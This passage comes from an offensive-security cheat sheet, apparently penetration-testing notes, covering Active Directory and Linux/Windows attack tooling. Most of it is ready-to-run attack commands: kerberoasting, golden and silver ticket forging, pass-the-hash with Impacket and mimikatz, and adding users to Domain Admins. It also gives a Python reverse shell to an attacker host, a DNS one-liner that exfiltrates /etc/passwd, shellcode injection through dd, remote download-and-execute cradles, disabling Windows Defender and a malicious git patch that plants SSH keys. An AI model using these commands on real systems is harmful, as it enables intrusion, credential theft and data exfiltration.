$ systemctl start neo4j
```

```c
$ sudo neo4j start console
$ sudo bloodhound --no-sandbox
```

> <http://localhost:7474/browser/>

#### Alternatively

```c
$ sudo npm install -g electron-packager
$ git clone https://github.com/BloodHoundAD/Bloodhound
$ cd BloodHound
$ npm install
$ npm run linuxbuild
$ cd BloodHound-linux-x64
$ sudo ./BloodHound --no-sandbox
```

#### Database Password Reset

> <http://localhost:7474/browser/>

```c
ALTER USER neo4j SET PASSWORD '<PASSWORD>'
```

#### Custom Queries

> <https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/red-teaming/bloodhound/Handy-BloodHound-Cypher-Queries.md>

**Custom Query Location on macOS**

```c
/System/Volumes/Data/Users/<USERNAME>/Library/Application Support/bloodhound/
```

### BloodHound Python

#### Build Docker Container

```c
$ docker build -t bloodhound.py
```

#### Collection Method All

```c
$ bloodhound-python -u <USERNAME> -p "<PASSWORD>" -d <DOMAIN> -gc <DOMAIN> -c all -ns <RHOST>
$ bloodhound-python -u <USERNAME> -p '<PASSWORD>' -d <DOMAIN> -dc <RHOST> -ns <RHOST> --dns-tcp -no-pass -c ALL --zip
```

#### LDAP Dumping

```c
$ bloodhound-python -u <USERNAME> -p '<PASSWORD>' -ns <RHOST> -d <DOMAIN> -c All
```

#### Parsing

```c
$ cat 20220629013701_users.json | jq | grep \"name\"
```

### Certify

> <https://github.com/GhostPack/Certify>

```c
PS C:\> Certify find /vulnerable
PS C:\> Certify.exe find /vulnerable /currentuser
```

### Certipy

> <https://github.com/ly4k/Certipy>

> <https://github.com/ly4k/BloodHound/>

#### Common Commands

```c
$ certipy find -dc-ip <RHOST> -u <USERNAME>@<DOMAIN> -p <PASSWORD>
```

#### Certificate Handling

**Account Creation**

```c
$ certipy account create -username <USERNAME>@<DOMAIN> -password <PASSWORD> -dc-ip <RHOST> -dns <DOMAIN_CONTROLLER_DNS_NAME> -user <COMPUTERNAME>
```

**Authentication**

```c
$ certipy auth -pfx <FILE>.pfx -dc-ip <RHOST> -u <USERNAME> -domain <DOMAIN>
```

**LDAP-Shell**

```c
$ certipy auth -pfx <FILE>.pfx -dc-ip <RHOST> -u <USERNAME> -domain <DOMAIN> -ldap-shell
```

```c
# add_user <USERNAME>
# add_user_to_group <GROUP>
```

**Certificate Forging**

```c
$ certipy template -username <USERNAME>@<DOMAIN> -password <PASSWORD> -template Web -dc-ip <RHOST> -save-old
```

**Certificate Request**

Run the following command twice because of a current issue with `certipy`.

```c
$ certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST>
```

```c
$ certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST> -upn <USERNAME>@<DOMAIN> -dns <FQDN>
$ certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST> -upn <USERNAME>@<DOMAIN> -dns <FQDN> -debug
```

#### Start BloodHound Fork

```c
$ ./BloodHound --disable-gpu-sandbox
```

### ClamAV

#### File Replacement Privilege Escalation

* Vulnerable Version 1.0.0

```c
$ clamscan --version
ClamAV 1.0.0/26853/Fri Mar 24 07:24:11 2023
```

**Example**

Create a custom `authorized_keys` file to replace another one. Then create a custom `database` with the `hex value` of the string you want to parse for.

```c
$ printf ssh | xxd -p
```

**custom\_malware.db**

```c
Malware=737368
```

**Execution**

```c
$ clamscan --remove=yes /root/.ssh/authorized_keys -d custom_malware.db
$ clamscan authorized_keys --copy=/root/.ssh/ -d custom_malware.db
```

### Credentials File

> <https://twitter.com/NinjaParanoid/status/1516442028963659777?t=g7ed0vt6ER8nS75qd-g0sQ\\&s=09>

> <https://www.nirsoft.net/utils/credentials\\_file\\_view.html>

```c
C:\ rundll32 keymgr.dll, KRShowKeyMgr
```

### dd

#### Execute Shellcode

```c
$ dd of=/proc/$$/mem bs=1 seek=$(($(cut -d" " -f9</proc/$$/syscall))) if=<(base64 -d<<<utz+IUO+aRkSKL+t3uH+McCwqQ8F) conv=notrunc
```

### DNS

#### Data Exfiltration

**Extract /etc/passwd**

```perl
$ perl -E 'qx^Cdig $_.$$.${\(rand)}.example.com^Cfor(unpack"H*",qx^?cat /etc/pas*^?)=~m^H(..)^Hgc'
```

^C, ^H, and ^? are the corresponding single ASCII values.

### enum4linux

> <https://github.com/CiscoCXSecurity/enum4linux>

```c
$ enum4linux -a <RHOST>
```

### enum4linux-ng

> <https://github.com/cddmp/enum4linux-ng>

```c
$ enum4linux-ng -A <RHOST>
```

### Excel

#### .csv Files Command Injection

If the file get's parsed on a Linux operationg system, commands can be injected to the rows.

```c
$ echo '" --exec="\!/dev/shm/<FILE>"' >> /PATH/TO/FILE/<FILE>.csv
```

### Evil-WinRM

> <https://github.com/Hackplayers/evil-winrm>

```c
$ evil-winrm -i <RHOST> -u <USERNAME> -p <PASSWORD>
```

```c
*Evil-WinRM* PS C:\> menu
```

#### Using Certificate and Private Key

```c
$ evil-winrm -i <RHOST> -c /PATH/TO/CERTIFICATE/<CERTIFICATE>.crt -k /PATH/TO/PRIVATE/KEY/<KEY>.key -p -u -S
```

#### Deactivate Windows Defender

```c
$ Set-MpPreference -DisableRealtimeMonitoring $true
```

#### PowerView\.ps1

> <https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1>

```c
$ evil-winrm -i compatibility -u '<USERNAME>' -p '<PASSWORD>' -s .
```

```c
*Evil-WinRM* PS C:\> menu
*Evil-WinRM* PS C:\> Bypass-4MSI
*Evil-WinRM* PS C:\> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\> $pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
*Evil-WinRM* PS C:\> $cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USERNAME>', $pass)
*Evil-WinRM* PS C:\> Add-DomainGroupMember -Identity 'Domain Admins' -Members '<USERNAME>' -Credential $cred
```

#### Check User

```c
*Evil-WinRM* PS C:\> Get-DomainUser <USERNAME> -Credential $cred
```

#### Code Execution

```c
*Evil-WinRM* PS C:\> Invoke-Command -Computer DC -Credential $cred -ScriptBlock { whoami; hostname }
```

#### Find a File

```c
*Evil-WinRM* PS C:\> Invoke-Command -Computer DC -Credential $cred -ScriptBlock { gci -recurse C:\Users <FILE>.txt }
```

#### Read a File

```c
*Evil-WinRM* PS C:\> Invoke-Command -Computer DC -Credential $cred -ScriptBlock { cat \path\to\file\<FILE>.txt }
```

#### Remove a User from a Group

```c
*Evil-WinRM* PS C:\> Invoke-Command -Computer DC -Credential $cred -ScriptBlock { net group "Domain Admins" <USERNAME> /del }
```

### find

#### Specific Size

```c
$ find / -size 50M    // find files with a size of 50MB
```

#### Modified Files

```c
$ find / -mtime 10    // find modified files in the last 10 days
$ find / -atime 10    // find accessed files in the last 10 days
$ find / -cmin -60    // find files changed within the last 60 minutes
$ find / -amin -60    // find files accesses within the last 60 minutes
```

#### Passwords

```c
$ find ./ -type f -exec grep --color=always -i -I 'password' {} \;
```

#### Group Permissions

```c
$ find / -group <group> 2>/dev/null
```

#### User specific Files

```c
$ find / -user <USERNAME> 2>/dev/null
$ find / -user <USERNAME> -ls 2>/dev/null
$ find / -user <USERNAME> 2>/dev/null | grep -v proc 2>/dev/null
$ find / -user <USERNAME> -ls 2>/dev/null | grep -v proc 2>/dev/null
```

#### SUID and SGID Files

```c
$ find / -perm -4000 2>/dev/null
$ find / -perm -4000 2>/dev/null | xargs ls -la
$ find / -type f -user root -perm -4000 2>/dev/null
$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
```

### functions

* Bash <4.2-048

```c
$ function /usr/sbin/<BINARY> { /bin/bash -p; }
$ export -f /usr/sbin/<BINARY>
$ /usr/sbin/<BINARY>
```

### gdbus

#### Privilege Escalation

> <https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/>

```c
$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/.ssh/authorized_keys /root/.ssh/authorized_keys true
```

### gem

```c
$ sudo gem open -e "/bin/sh -c /bin/sh" rdoc
```

### Git

#### Git apply (Malicious Patch) Privilege Escalation

**Payload**

```c
diff --git a/x b/../../../home/<USERNAME>/.ssh/authorized_keys
new file mode 100400
index 0000000..a3d61a0
--- /dev/null
+++ b/../../../home/<USERNAME>/.ssh/authorized_keys
@@ -0,0 +1 @@
+<SSH_PUBLIC_KEY>
```

**Execution**

```c
$ git apply patch --unsafe-paths
```

#### Git Attributes Privilege Escalation

> <https://git-scm.com/book/en/v2/Customizing-Git-Git-Attributes#filters\\_b>

Notice that I only found this within a CTF so far. The pre-requisites are `git commit` get's executed via `script`.

**Payload**

```c
export RHOST="<LHOST>";export RPORT=<LPORT>;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
```

**Execution**

```c
$ git init
$ echo '*.c filter=indent' > .git/info/attributes
$ git config filter.indent.clean /tmp/<FILE>
$ sudo -u <USERNAME> git-commit.sh
```

### gMSADumper

> <https://github.com/micahvandeusen/gMSADumper>

```c
$ python3 gMSADumper.py -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -l dc.<DOMAIN>
```

### grep

```c
$ grep -R db_passwd
$ grep -roiE "password.{20}"
$ grep -oiE "password.{20}" /etc/*.conf
$ grep -v "^[#;]" /PATH/TO/FILE | grep -v "^$"    // grep for passwords like "DBPassword:"
```

### gsocket

#### Shell

```c
$ bash -c "$(curl -fsSL gsocket.io/x)"
```

### Impacket

> <https://github.com/fortra/impacket>

```c
$ impacket-smbserver local . -smb2support
$ impacket-reg <DOMAIN>/<USERNAME>:<PASSWORD:PASSWORD_HASH>@<RHOST> <ACTION> <ACTION>
$ impacket-services <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> <ACTION>
$ impacket-netview <DOMAIN>/<USERNAME> -targets /PATH/TO/FILE/<FILE>.txt -users /PATH/TO/FILE/<FILE>.txt
$ impacket-lookupsid <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
$ impacket-GetADUsers -all -dc-ip <RHOST> <DOMAIN>/
$ impacket-getST <DOMAIN>/<USERNAME>$ -spn WWW/<DOMAIN_CONTROLLER>.<DOMAIN> -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
$ impacket-rpcdump <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
$ impacket-samrdump <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
$ impacket-atexec -k -no-pass <DOMAIN>/Administrator@<DOMAIN_CONTROLLER>.<DOMAIN> 'type C:\PATH\TO\FILE\<FILE>'
```

#### impacket-smbclient

```c
$ export KRB5CCNAME=<USERNAME>.ccache
$ impacket-smbclient <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
$ impacket-smbclient -k <DOMAIN>/<USERNAME>@<RHOST>.<DOMAIN> -no-pass
```

#### impacket-getTGT

```c
$ impacket-getTGT <DOMAIN>/<USERNAME>:<PASSWORD>
$ impacket-getTGT <DOMAIN>/<USERNAME> -dc-ip <DOMAIN> -hashes aad3b435b51404eeaad3b435b51404ee:7c662956a4a0486a80fbb2403c5a9c2c
```

#### impacket-GetNPUsers

```c
$ impacket-GetNPUsers <DOMAIN>/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
$ impacket-GetNPUsers <DOMAIN>/<USERNAME> -request -no-pass -dc-ip <RHOST>
$ impacket-GetNPUsers <DOMAIN>/ -usersfile usernames.txt -format john -outputfile hashes
```

#### impacket-getUserSPNs / GetUserSPNs.py

```c
$ export KRB5CCNAME=<USERNAME>.ccache
$ impacket-GetUserSPNs <DOMAIN>/<USERNAME>:<PASSWORD> -k -dc-ip <RHOST>.<DOMAIN> -no-pass -request
$ ./GetUserSPNs.py <DOMAIN>/<USERNAME>:<PASSWORD> -k -dc-ip <RHOST>.<DOMAIN> -no-pass -request
```

#### impacket-secretsdump

```c
$ export KRB5CCNAME=<USERNAME>.ccache
$ impacket-secretsdump <DOMAIN>/<USERNAME>@<RHOST>
$ impacket-secretsdump -k <DOMAIN>/<USERNAME>@<RHOST>.<DOMAIN> -no-pass -debug
$ impacket-secretsdump -ntds ndts.dit -system system -hashes lmhash:nthash LOCAL -output nt-hash
$ impacket-secretsdump -dc-ip <RHOST> <DOMAIN>.LOCAL/svc_bes:<PASSWORD>@<RHOST>
$ impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
```

#### impacket-psexec

```c
$ impacket-psexec <USERNAME>@<RHOST>
$ impacket-psexec <DOMAIN>/administrator@<RHOST> -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
```

#### impacket-ticketer

**Requirements**

* Valid User
* NTHASH
* Domain-SID

```c
$ export KRB5CCNAME=<USERNAME>.ccache
$ impacket-ticketer -nthash C1929E1263DDFF6A2BCC6E053E705F78 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain <DOMAIN> -spn MSSQLSVC/<RHOST>.<DOMAIN> -user-id 500 Administrator
```

**Fixing \[-] exceptions must derive from BaseException**

**Issue**

```c
$ ./GetUserSPNs.py <DOMAIN>/<USERNAME>:<PASSWORD> -k -dc-ip <DOMAIN_CONTROLLER>.<DOMAIN> -no-pass -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] exceptions must derive from BaseException
```

**To fix it**

```c
241         if self.__doKerberos:
242             #target = self.getMachineName()
243             target = self.__kdcHost
```

#### dacledit.py

> <https://github.com/fortra/impacket/blob/204c5b6b73f4d44bce0243a8f345f00e308c9c20/examples/dacledit.py>

```c
$ python3 dacledit.py <DOMAIN>/<USERNAME>:<PASSWORD> -k -target-dn 'DC=<DOMAIN>,DC=<DOMAIN>' -dc-ip <RHOST> -action read -principal '<USERNAME>' -target '<GROUP>' -debug
```

**Fixing msada\_guids Error**

```c
#from impacket.msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
from msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
```

Then put the `msada_guids.py` into the same directory as `dacledit.py`

> <https://github.com/Porchetta-Industries/CrackMapExec/blob/master/cme/helpers/msada\\_guids.py>

#### owneredit.py

> <https://github.com/fortra/impacket/blob/5c477e71a60e3cc434ebc0fcc374d6d108f58f41/examples/owneredit.py>

```c
$ python3 owneredit.py -k '<DOMAIN>/<USERNAME>:<PASSWORD>' -dc-ip <RHOST> -action write -new-owner '<USERNAME>' -target '<GROUP>' -debug
```

### Internet Information Service (IIS)

#### Application Pool Credential Dumping

```c
C:\Windows\System32\inetsrv>appcmd.exe list apppool /@:*
```

### JAWS

> <https://github.com/411Hall/JAWS>

```c
PS C:\> IEX(New-Object Net.webclient).downloadString('http://<LHOST>:<LPORT>/jaws-enum.ps1')
```

### Kerberos

#### Authentication

> <https://csforza.gitbook.io/pentesting-articles-and-notes/windows/active-directory/kerberos-authentication>

If a user wants to obtain access to resources within a Active Directory network, he must obtain a ticket through a `6-step` process.

1. User sends a request to the `Kerberos Distribution Center (KDC)` with his password hash and a timestamp. (AS-REQ)
2. If the `password hash` of the user matches that for the user on the `KDC`, the user receives a `Ticket Granting Ticket` encrypted and signed by the `krbtgt` account. (AS-REP)
3. The `TGT`, including the `krbtgt hash`, is sent to the `KDC` or `DC` in order to recieve a `Kerberos Service Ticket (TGS)`. (TGS-REQ)
4. User then receives a `TGS` encrypted with the `hash` of the service account he wishes to access. (TGS-REP)
5. User then connects to the server and attempts to use the service he sent the `initial request` for with the `TGS` included. (AP-REQ)
6. User gains access and mutual authentication is given between the server and client if necessary (AP-REP).

**Constrained Delegation**

> <https://csforza.gitbook.io/pentesting-articles-and-notes/windows/active-directory/privilege-escalation/constrained-delegation>

> <https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation>

* `Constrained Delegation` limits the services to which a service can access on behalf of a user.
* This service account must still be `trusted` to `delegate`.
* The user does `not authenticate` with `Kerberos` to the `constrained service`.
* Instead of authenticating to the `KDC` first, like in a regular Kerberos ticket request, the user authenticates `directly to the service`.
* Once the user authenticates to the service, the service then requests a `forwardable TGT` to the `KDC` without the user's password included.
* The `KDC` checks the `TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION` attribute on the service and whether or not the user's account is blocked.
* If everything checks out a ticket is returned.
* Ticket gets `passed back` to the `KDC` and a `TGS ticket` is requested to the `second service`.
* `KDC` checks the `msDS-AllowedToDelegateTo` field on the second service and if it is listed, then an `access ticket` is granted.
* `TGS` gets sent to the next service and the user now can authenticate to it.

The `Service for User (S4U)` extension is used to aid the impersonation process when `Constrained Delegation` is used. The extension has two extensions within it:

* `Service for User to Self (S4U2Self)`: This allows a service to obtain a `forwardable TGS` to itself on the user's behalf with the `User Principal Name` supplied. No password is included.
* `Service for User to Proxy (S4U2proxy)`: This allows the service to `obtain` the required `TGS` on the user's behalf to the second service the user needs to connect to. This second service will have the `msDS-AllowedToDelegateTo` attribute given to it. User tokens can be forwarded to those `SPN's` which have this attribute given.

Delegation occurs not only for the specified service, but also for ANY service running under the account that is running the service.

**Unconstrained Delegation**

> <https://csforza.gitbook.io/pentesting-articles-and-notes/windows/active-directory/privilege-escalation/unconstrained-delegation>

> <https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation>

Kerberos Delegation allows for users to access resources on another server via a service that the user has access to. The service the user is connected to impersonates that user by resusing his credentials which then allows the user to gain access to that server.

* When `Unconstrained Delegation` is enabled, the user's `TGT` is sent along with the `TGS` to the first hop service. That `TGT` gets stored in the server's `LSASS` which allows the service to take it out and delegate with it if necessary.
* Accounts or services with `Unconstrained Delegation` can be escalated to an account with higher privileges, if a Domain Admin or a higher privileged user connecting to that machine.
* The `TGT` can be extracted and the ticket `reused`.

**Resource-based Constrained Delegation (RBCD)**

> <https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution>

> <https://blog.netwrix.com/2022/09/29/resource-based-constrained-delegation-abuse/>

> <https://learn.microsoft.com/en-us/windows-server/security/kerberos/kerberos-constrained-delegation-overview>

* In `unconstrained` and `constrained Kerberos delegation`, a `computer/user` is told what resources it can delegate authentications to.
* In `Resource-based Kerberos Delegation`, computers (resources) specify who they `trust` and who can `delegate` authentications to them.
* By supporting constrained delegation across domains, `services` can be `configured` to use `constrained delegation` to `authenticate` to `servers` in other domains rather than using unconstrained delegation.
* This provides `authentication support` for across domain service solutions by using an existing Kerberos infrastructure `without` needing to trust `front-end services` to delegate to any service.

**Prerequisites**

* Populate the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute with a computer account that will be controlled.
* Know a `SPN` set on the object to gain access.
* Create a new `computer account` using PowerMad (allowed due to the default MachineAccountQuota value).
* Leverage Rubeus to abuse `Resource-Based Constrained Delegation`.

**Kerberoasting**

> <https://csforza.gitbook.io/pentesting-articles-and-notes/windows/active-directory/privilege-escalation/kerberoasting>

> <https://xedex.gitbook.io/internalpentest/internal-pentest/active-directory/post-compromise-attacks/kerberoasting>

* All user accounts that have `Service Principal Names (SPN's)` set can be kerberoasted.
* Relatively silent technique because it leaves only one `4769 ID event` on the log.

**AS-REP Roasting**

> <https://csforza.gitbook.io/pentesting-articles-and-notes/windows/active-directory/privilege-escalation/as-rep-roasting>

> <https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat>

ASPREPRoast is about retrieving crackable hashes from `KRB5 AS-REP` responses for users without `kerberoast preauthentication` enabled. This isn't as useful as Kerberoasting, as accounts have to have `DONT_REQ_PREAUTH` explicitly set for them to be vulnerable and you are still reliant upon weak password complexity for the attack to work.

* `AS-REP roasting` is a technique that allows retrieving password hashes for users that have `Do not require Kerberos preauthentication` property selected.
* Those hashes can then be cracked offline.

**Silver, Golden and Diamond Tickets**

* Silver Ticket is a forged service authentication ticket (Service Principal Name (SPN) and Machine Account Keys (Hash in RC4 or AES) needed). Silver Tickets do not touch the Domain Controller (DC).
* Golden Ticket is a Ticket Granting Ticket (TGT) and completely forged offline (KRBTGT Account Hash needed).
* Diamond Ticket is essentially a Golden Ticket but requested from a Domain Controller (DC).

#### Attacking Kerberos

> <https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a>

**Bruteforce**

```c
$ ./kerbrute -domain <DOMAIN> -users <FILE> -passwords <FILE> -outputfile <FILE>
```

**With List of Users**

```c
C:\> .\Rubeus.exe brute /users:<FILE> /passwords:<FILE> /domain:<DOMAIN> /outfile:<FILE>
```

**Check Passwords for all Users in Domain**

```c
C:\> .\Rubeus.exe brute /passwords:<FILE> /outfile:<FILE>
```

**ASPREPRoast**

**Check ASPREPRoast for all Domain Users (Credentials required)**

```c
$ impacket-GetNPUsers <DOMAIN>/<USERNAME>:<PASSWORD> -request -format hashcat -outputfile <FILE>
$ impacket-GetNPUsers <DOMAIN>/<USERNAME>:<PASSWORD> -request -format john -outputfile <FILE>
```

**Check ASPREPRoast for a List of Users (No Credentials required)**

```c
$ impacket-GetNPUsers <DOMAIN>/ -usersfile <FILE> -format hashcat -outputfile <FILE>
$ impacket-GetNPUsers <DOMAIN>/ -usersfile <FILE> -format john -outputfile <FILE>
```

**Check ASPREPRoast for all Domain Users in Domain**

```c
C:\> .\Rubeus.exe asreproast  /format:hashcat /outfile:<FILE>
```

**Kerberoasting**

```c
$ python GetUserSPNs.py <DOMAIN>/<USERNAME>:<PASSWORD> -outputfile <FILE>
C:\> .\Rubeus.exe kerberoast /outfile:<FILE>
PS C:\> iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
PS C:\> Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII <FILE>
PS C:\> Invoke-Kerberoast -OutputFormat john | % { $_.Hash } | Out-File -Encoding ASCII <FILE>
```

**Overpass The Hash/Pass The Key (PTK)**

**Request TGT with Hash**

```c
$ impacket-getTGT <DOMAIN>/<USERNAME> -hashes <LMHASH>:<NTLMHASH>
```

**Request TGT with aesKey (More secure Encryption, probably more stealth due is it used by Default)**

```c
$ impacket-getTGT <DOMAIN>/<USERNAME> -aesKey <KEY>
```

**Request TGT with Password**

```c
$ impacket-getTGT <DOMAIN>/<USERNAME>:<PASSWORD>
```

**Set TGT for Impacket Usage**

```c
$ export KRB5CCNAME=<USERNAME>.ccache
```

**Execute Remote Commands**

```c
$ impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
```

**Ask and inject the Ticket**

```c
C:\> .\Rubeus.exe asktgt /domain:<DOMAIN> /user:<USERNAME> /rc4:<NTLMHASH> /ptt
```

**Execute a CMD on Remote Host**

```c
C:\> .\PsExec.exe -accepteula \\<RHOST> cmd
```

**Pass The Ticket (PTT)**

**Harvest Tickets from Linux**

**Check Type and Location of Tickets**

```c
$ grep default_ccache_name /etc/krb5.conf
```

* If none return, default is FILE:/tmp/krb5cc\_%{uid}
* In Case of File Tickets it is possible to Copy-Paste them to use them
* In Case of being KEYRING Tickets, the Tool tickey can be used to get them
* To dump User Tickets, if root, it is recommended to dump them all by injecting in other user processes
* To inject, the Ticket have to be copied in a reachable Folder by all Users

```c
$ cp tickey /tmp/tickey
$ /tmp/tickey -i
```

**Harvest Tickets from Windows**

```c
mimikatz # sekurlsa::tickets /export
$ .\Rubeus dump
```

**Convert Tickets dumped with Rubeus into base64**

```c
[IO.File]::WriteAllBytes("<TICKET>.kirbi", [Convert]::FromBase64String("<TICKET>"))
```

**Convert Tickets between Linux and Windows Format with ticket\_converter.py**

> <https://github.com/Zer1t0/ticket\\_converter>

```c
$ python ticket_converter.py ticket.kirbi ticket.ccache
$ python ticket_converter.py ticket.ccache ticket.kirbi
```

**Using Ticket on Linux**

```c
$ export KRB5CCNAME=<USERNAME>.ccache
```

**Execute Remote Commands by using TGT**

```c
$ impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
```

**Using Ticket on Windows**

**Inject Ticket with mimikatz**

```c
mimikatz # kerberos::ptt <KIRBI_FILE>
```

**Inject Ticket with Rubeus**

```c
C:\> .\Rubeus.exe ptt /ticket:<KIRBI_FILE>
```

**Execute a CMD on Remote Host**

```c
C:\> .\PsExec.exe -accepteula \\<RHOST> cmd
```

**Silver Ticket**

**Impacket Examples**

**Generate TGS with NTLM**

```c
$ python ticketer.py -nthash <NTLMHASH> -domain-sid <SID> -domain <DOMAIN> -spn <SPN>  <USERNAME>
```

**Generate TGS with aesKey**

```c
$ python ticketer.py -aesKey <KEY> -domain-sid <SID> -domain <DOMAIN> -spn <SPN>  <USERNAME>
```

**Set the ticket for impacket use**

```c
$ export KRB5CCNAME=<USERNAME>.ccache
```

**Execute Remote Commands by using TGT**

```c
$ impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
```

**mimikatz Examples**

**Generate TGS with NTLM**

```c
mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /rc4:<NTLMHASH> /user:<USERNAME> /service:<SERVICE> /target:<RHOST>
```

**Generate TGS with AES 128bit Key**

```c
mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes128:<KEY> /user:<USERNAME> /service:<SERVICE> /target:<RHOST>
```

**Generate TGS with AES 256bit Key (More secure Encryption, probably more stealth due is it used by Default)**

```c
mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes256:<KEY> /user:<USERNAME> /service:<SERVICE> /target:<RHOST>
```

**Inject TGS with Mimikatz**

```c
$ mimikatz # kerberos::ptt <KIRBI_FILE>
```

\##3## Rubeus Examples

```c
C:\> .\Rubeus.exe ptt /ticket:<KIRBI_FILE>
```

**Execute CMD on Remote Host**

```c
C:\> .\PsExec.exe -accepteula \\<RHOST> cmd
```

**Golden Ticket**

**Impacket Examples**

**Generate TGT with NTLM**

```c
$ python ticketer.py -nthash <KRBTGT_NTLM_HASH> -domain-sid <SID> -domain <DOMAIN>  <USERNAME>
```

**Generate TGT with aesKey**

```c
$ python ticketer.py -aesKey <KEY> -domain-sid <SID> -domain <DOMAIN>  <USERNAME>
```

**Set TGT for Impacket Usage**

```c
$ export KRB5CCNAME=<USERNAME>.ccache
```

**Execute Remote Commands by using TGT**

```c
$ impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
```

**mimikatz Examples**

**Generate TGT with NTLM**

```c
mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /rc4:<KRBTGT_NTLM_HASH> /user:<USERNAME>
```

**Generate TGT with AES 128bit Key**

```c
mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes128:<KEY> /user:<USERNAME>
```

**Generate TGT with AES 256bit Key (More secure Encryption, probably more stealth due is it used by Default)**

```c
mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes256:<KEY> /user:<USERNAME>
```

**Inject TGT with Mimikatz**

```c
mimikatz # kerberos::ptt <KIRBI_FILE>
```

**Rubeus Examples**

**Inject Ticket with Rubeus**

```c
C:\> .\Rubeus.exe ptt /ticket:<KIRBI_FILE>
```

**Execute CMD on Remote Host**

```c
C:\> .\PsExec.exe -accepteula \\<RHOST> cmd
```

**Get NTLM from Password**

```c
$ python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<PASSWORD>".encode("utf-16le")).digest())'
```

### Krbrelayx

> <https://github.com/dirkjanm/krbrelayx>

#### Abuse DNS Delegation Zones with dnstool.py

```c
$ python3 dnstool.py -u 'domain\<USERNAME>' -p '<PASSWORD>' -a add -r '<TO_ABUSE>.<DOMAIN>' -d <LHOST> <RHOST>
```

### LAPS

```c
PS C:\Users\<USERNAME>\Documents> $Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime
PS C:\Users\<USERNAME>\Documents> $Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-Adm-PwdExpirationTime
```

### LDAP

> <https://github.com/infosecn1nja/AD-Attack-Defense>

> <https://www.poweradmin.com/blog/restoring-deleted-objects-from-active-directory-using-ad-recycle-bin/>

> <https://adsecurity.org/?p=2288>

#### Queries

```c
$ (New-Object adsisearcher((New-Object adsi("LDAP://dc.<DOMAIN>.local","<DOMAIN>\<USERNAME>","<PASSWORD>")),"(objectCategory=Computer)")).FindAll() | %{ $_.Properties.name }
